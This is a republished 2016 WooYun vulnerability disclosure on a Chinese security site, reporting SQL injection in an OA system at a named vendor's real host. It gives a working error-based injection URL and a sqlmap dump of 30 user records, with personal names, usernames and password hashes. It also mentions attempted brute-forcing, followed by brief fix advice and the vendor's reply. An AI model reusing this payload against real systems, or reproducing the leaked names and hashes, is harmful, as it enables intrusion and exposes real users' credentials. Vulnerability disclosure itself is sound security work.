新网互联某系统SQL注入 admin 139540文章 114评论 2017年4月19日10:13:59评论273 views字数 203阅读0分40秒阅读模式 摘要2016-04-19: 细节已通知厂商并且等待厂商处理中 2016-04-21: 厂商已经确认,细节仅向厂商公开 2016-05-01: 细节向核心白帽子及相关领域专家公开 2016-05-11: 细节向普通白帽子公开 2016-05-21: 细节向实习白帽子公开 2016-06-05: 细节向公众公开 漏洞概要 关注数(5) 关注此漏洞 缺陷编号: WooYun-2016-197851 漏洞标题: 新网互联某系统SQL注入 相关厂商: 北京新网互联科技有限公司 漏洞作者: 路人甲 提交时间: 2016-04-19 10:00 公开时间: 2016-06-05 09:40 漏洞类型: SQL注射漏洞 危害等级: 高 自评Rank: 15 漏洞状态: 厂商已经确认 漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系 Tags标签: 注入 3人收藏 漏洞详情 披露状态: 2016-04-19: 细节已通知厂商并且等待厂商处理中 2016-04-21: 厂商已经确认,细节仅向厂商公开 2016-05-01: 细节向核心白帽子及相关领域专家公开 2016-05-11: 细节向普通白帽子公开 2016-05-21: 细节向实习白帽子公开 2016-06-05: 细节向公众公开 简要描述: 终于凑齐了七颗龙珠 神龙:我可以实现你一个愿望 我:我要一盏阿拉丁神灯 阿拉丁:我可以实现你三个愿望,说吧 我:第一,我要比马云有钱,第二,给我一个神级妹子,第三,我要七颗龙珠 神龙:我可以实现你一个愿望 我:我要一盏阿拉丁神灯…… 详细说明: code 区域 http://oa.dns.com.cn/interface/ugo.php?OA_USER=aaaaaa%2527%20and%201=(updatexml(1,(concat(0x7c,(select%20user()),0x7c,(select%20database()))),1))%23 code 区域 错误#1105: XPATH syntax error: '|td_oa' SQL语句: SELECT * from USER where USER_ID='aaaaaa' and 1=(updatexml(1,(concat(0x7c,(select user()),0x7c,(select database()))),1))#' or BYNAME='aaaaaa' and 1=(updatexml(1,(concat(0x7c,(select user()),0x7c,(select database()))),1))#' 文件:/interface/ugo.php code 区域 sql-shell> select user_id,email,user_name,password from user limit 30 [16:25:57] [INFO] fetching SQL SELECT statement query output: 'select user_id,email,user_name,password from user limit 30' [16:25:57] [INFO] retrieved: zzzzz [16:25:57] [INFO] retrieved: $1$Ig2.xy1.$wJlWszTHMHtcUvhCWf.hZ0 [16:25:58] [INFO] retrieved: 艾恒鑫 [16:25:58] [INFO] retrieved: $1$4.5.5P1.$sQ7I/84gzf/A9K.GkXuDB0 [16:25:58] [INFO] retrieved: 艾文山 [16:25:58] [INFO] retrieved: $1$oH0.RE2.$lPJ9QsfjehVBAOJNAQIN.1 [16:25:58] [INFO] retrieved: 安丰博 [16:25:58] [INFO] retrieved: $1$GO..XV5.$DtjM4ZTl82iSwas5TRUdF/ [16:25:58] [INFO] retrieved: 敖丹丹 [16:25:58] [INFO] retrieved: $1$Eq3.7O4.$/Rg8Dh1Mp6sInDwlIEfLx1 [16:25:58] [INFO] retrieved: 白慧丽 [16:25:58] [INFO] retrieved: $1$zs..AA5.$05qoUHy/QtIC17zuaqI9V0 [16:25:58] [INFO] retrieved: 白嗣晔 [16:25:58] [INFO] retrieved: $1$.o..tY1.$SnLUaXL/EO0ppfWPO4Xp70 [16:25:58] [INFO] retrieved: 白添阳 [16:25:58] [INFO] retrieved: $1$Ip0.xH/.$JoIk9tXERoRr01z67Tyh./ [16:25:58] [INFO] retrieved: 白杨 [16:25:58] [INFO] retrieved: $1$Sx0.zw5.$1BBofWPuq88GXqLL04Hqf. [16:25:58] [INFO] retrieved: 鲍俊林 [16:25:59] [INFO] retrieved: $1$o84.Rv..$YckATjcuf3Q2RcQX6chL0/ [16:25:59] [INFO] retrieved: 鲍俊霖 [16:25:59] [INFO] retrieved: $1$mL1.1F4.$SxZ0dgx1yk2ALgEiiMRBf0 [16:25:59] [INFO] retrieved: 鲍远洋 [16:25:59] [INFO] retrieved: $1$J54.er1.$ScWHoMRpvCzpnHoTkfNQa. [16:25:59] [INFO] retrieved: 毕波 [16:25:59] [INFO] retrieved: $1$49/.58..$FAwZv12BaVkUr2gGX1adm0 [16:25:59] [INFO] retrieved: 边亚南 [16:25:59] [INFO] retrieved: $1$ak1.b/4.$zVbqoV5JSvCjHmh/oHkcq/ [16:25:59] [INFO] retrieved: 卜凡飞 [16:25:59] [INFO] retrieved: $1$Uj2.Nu1.$RvWglVF1Nwt2RdysY20iC. [16:25:59] [INFO] retrieved: 蔡国庆 [16:25:59] [INFO] retrieved: $1$2C/.hR1.$6pniafNpxYR6K0VE59sUA0 [16:25:59] [INFO] retrieved: 蔡坤龙 [16:25:59] [INFO] retrieved: $1$lp3.KR4.$qee.dgbVgEH5lnhy.mWyd. [16:25:59] [INFO] retrieved: 蔡擂 [16:26:00] [INFO] retrieved: $1$Qw2.ZQ4.$eE6ZP8I5/KadKv65kGjpf0 [16:26:00] [INFO] retrieved: 蔡熙 [16:26:00] [INFO] retrieved: $1$u14.fO0.$uYSKz./m1mN/jdGPsnCvE. [16:26:00] [INFO] retrieved: 曹苍明 [16:26:00] [INFO] retrieved: $1$8o5.vZ5.$m6DAC6.kjHp.92spxGkse. select user_id,email,user_name,password from user limit 30 [30]: [*] 123, , 苏涛, $1$0I3.Hs5.$Pq2Sw5RZPMTWjV3fxbg/e/ [*] aba, , 蒋群, $1$iX3.D4/.$QmH2E/LlibJgvJaaNkShA. [*] abcde, , 郭波, $1$UM5.Nj1.$LUMSssxzOoapaVNyd9aGg. [*] admin, , 李晖, $1$Mo5.lB2.$0xZzSKqJDFgVSp.SptG2k/ [*] asd, , 马燕达, $1$6s4.Va5.$G0qGl4idG8/O9v4tn7gtP. [*] sunysh, , 宋农, $1$uL..fS4.$nMKOUKbWVawzToC2.H/9N1 [*] testpwd, , 杨国富, $1$iX2.D42.$lJ..rMcaf6q1E6O7QwvO3. [*] testpwd1, , 朱尹民, $1$yz1.TB3.$Ew2B7oAC.ihmNY253q7T00 [*] testpwd2, , 柯林, $1$6l..Vf3.$iJzsPo9u3Er.Fhvddpw2d. [*] zzz, , 赵志勇, $1$Ul/.NI..$mEzQAL1Iwxjdhcrfp39XA/ [*] zzzzz, , 陈琳, $1$Ig2.xy1.$wJlWszTHMHtcUvhCWf.hZ0 [*] 艾恒鑫, , 蓝斌, $1$4.5.5P1.$sQ7I/84gzf/A9K.GkXuDB0 [*] 艾文山, , 雷晓军, $1$oH0.RE2.$lPJ9QsfjehVBAOJNAQIN.1 [*] 安丰博, , 雷有福, $1$GO..XV5.$DtjM4ZTl82iSwas5TRUdF/ [*] 敖丹丹, , 任俊, $1$Eq3.7O4.$/Rg8Dh1Mp6sInDwlIEfLx1 [*] 白慧丽, , 孙星, $1$zs..AA5.$05qoUHy/QtIC17zuaqI9V0 [*] 白嗣晔, , 王泽宾, $1$.o..tY1.$SnLUaXL/EO0ppfWPO4Xp70 [*] 白添阳, , 谢志强, $1$Ip0.xH/.$JoIk9tXERoRr01z67Tyh./ [*] 白杨, , 杨纯, $1$Sx0.zw5.$1BBofWPuq88GXqLL04Hqf. [*] 鲍俊林, , 尹寒, $1$o84.Rv..$YckATjcuf3Q2RcQX6chL0/ [*] 鲍俊霖, , 翟峰, $1$mL1.1F4.$SxZ0dgx1yk2ALgEiiMRBf0 [*] 鲍远洋, , 张建, $1$J54.er1.$ScWHoMRpvCzpnHoTkfNQa. [*] 毕波, , 赵楠, $1$49/.58..$FAwZv12BaVkUr2gGX1adm0 [*] 边亚南, , 朱华, $1$ak1.b/4.$zVbqoV5JSvCjHmh/oHkcq/ [*] 卜凡飞, , 雷晓军1, $1$Uj2.Nu1.$RvWglVF1Nwt2RdysY20iC. [*] 蔡国庆, , 李立卿, $1$2C/.hR1.$6pniafNpxYR6K0VE59sUA0 [*] 蔡坤龙, , 罗翔, $1$lp3.KR4.$qee.dgbVgEH5lnhy.mWyd. [*] 蔡擂, , 尚天职, $1$Qw2.ZQ4.$eE6ZP8I5/KadKv65kGjpf0 [*] 蔡熙, , 周立国, $1$u14.fO0.$uYSKz./m1mN/jdGPsnCvE. [*] 曹苍明, , 陈晨, $1$8o5.vZ5.$m6DAC6.kjHp.92spxGkse. 漏洞证明: code 区域 总共700多个账号密码,密码不知道怎么解密...这就很尴尬了....尝试爆破没爆破到弱口令...空气都变得尴尬了.. 修复方案: 1.转码后addslashes. 2.目测这个漏洞存在很久了,查下日志吧,看看有没有被入侵。 3.别打程序员;别打运维。 版权声明:转载请注明来源 路人甲@乌云 漏洞回应 厂商回应: 危害等级:低 漏洞Rank:5 确认时间:2016-04-21 09:40 厂商回复: 独立的OA系统,没啥有用的数据 最新状态: 暂无 漏洞评价: 对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值 漏洞评价(共0人评价): 登陆后才能进行评分 评价 免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。 点赞 https://cn-sec.com/archives/3579.html 复制链接 复制链接 左青龙 微信扫一扫 右白虎 微信扫一扫
评论